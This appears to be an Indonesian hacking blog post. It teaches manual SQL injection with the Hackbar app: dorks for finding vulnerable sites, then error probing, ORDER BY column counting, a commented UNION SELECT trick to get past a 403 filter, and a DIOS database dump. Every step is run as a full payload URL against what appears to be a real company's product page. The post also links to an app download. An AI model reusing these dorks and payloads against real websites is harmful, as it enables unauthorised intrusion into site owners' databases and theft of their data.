SQL INJECTION Dan Tembusin Forbidden 403

 

SQL INJECTION ATTACK

haloo cuk kembali lagi dengan gw

 Kali ini saya akan membagikan tutorial SQL Injection Manual menggunakan Hackbar. Selamat membaca!

Sebelumnya saya akan mengenalkan apa itu SQL Injection. 

 SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa pemrograman lain.

Binggung?Apalagi Gw Udah ah cukup basa-basinya. Langsung aja Ke Tutorialnya!!

Pertama2 Kalian Harus Dowload Dulu Apknya

Apk Dh Hackbar Dowload Di Link Di Bawah Ini:

https://blog.pst4r8.my.id/download-dh-hackbar-apk-android-terbaru/

Kalau Udah Dowload Kalian Cari Website Vuln Mengunakan Dork

Dork:

-inurl berita.php id=1

-inurl //product.php id=

-inurl:newsone.php?id=

-inurl:trainers.php?id=

-inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

Selebihnya Kalian Bisa Kembangin:) 

Pertama, kita harus mencari target terlebih dahulu. Banyak cara untuk mencari target, salah satunya adalah dengan dorking. Dan disini saya sudah memiliki target

 yaitu: https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16

Lanjut Kalian Masuk ke Apk Dh Hackbar

Kita sudah berada di halaman web target. Sekarang, kita tambahkan ' di ujung URL web target kita tadi Kalau Error Berarti Vuln. Kemudian Kalian Column Count Trus Kalian Cari Errornya.Column count Mulai Dari 50 Trus Kalian Urutin Ke Bawah Sampai Ketemu Error Jangan lupa Tanda --+- Di Belakangnya

Di Gw Error nya Di 26 Berarti Kita Pakai No 25

Column count ORDER BY Contoh:

 https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16'ORDER+BY+25--+-

Kalau Udah Kalian Hapus Lagi ORDER BY NYA

Kayak gini : https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16'

Kalau Udah Tekan Union Statements 

Disini 403 Forbidden Ya Berarti Kita Hapus Dulu Union Statements nya  kayak Gini :

https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-

Trus Klian masukin Union Select Bypass

Trus Kalian Klik Union Dan Union Select Kayak Gini: '/*!50000UNION*//*!/*!50000SELECT*/

Contohnya: https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16'/*!50000UNION*//*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-

Trus Tambahin Tanda -Di Belakang Angka 16

https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=-16'/*!50000UNION*//*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-

Dan Boom! Keluar No Togelnya Kalau 403 Forbidden Ya Kalau Gk Ya Gk Usah Pakai Union Select Bypass langsung Aja Ke Union Select statemens nya:) 

Nah Tinggal Kita Dump Target Kita Caranya Gini:

Itu Kan Nomor Togelnya 4 Kalian Hapus Angka 4 Trus Kalian Masukin Dios Contohnya gini :

https://www.sekarlaut.com/products.php?lang=id&action=detail&ID=16'/*!50000UNION*//*!50000SELECT*/+1,2,3,,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+- 

Itu Kan Angka 4nya gw Hapus Jadi Kalian Masukin Dios Nya,, Trus Masukin Nickname Kalian Truss Klik Execute 

Duar Mwmwk!! 

Nah Faham kan? Faham Lah ya Kalau Kalian Teliti Bacanya 

Oke Sekian Tutorialnya Terimakasih:)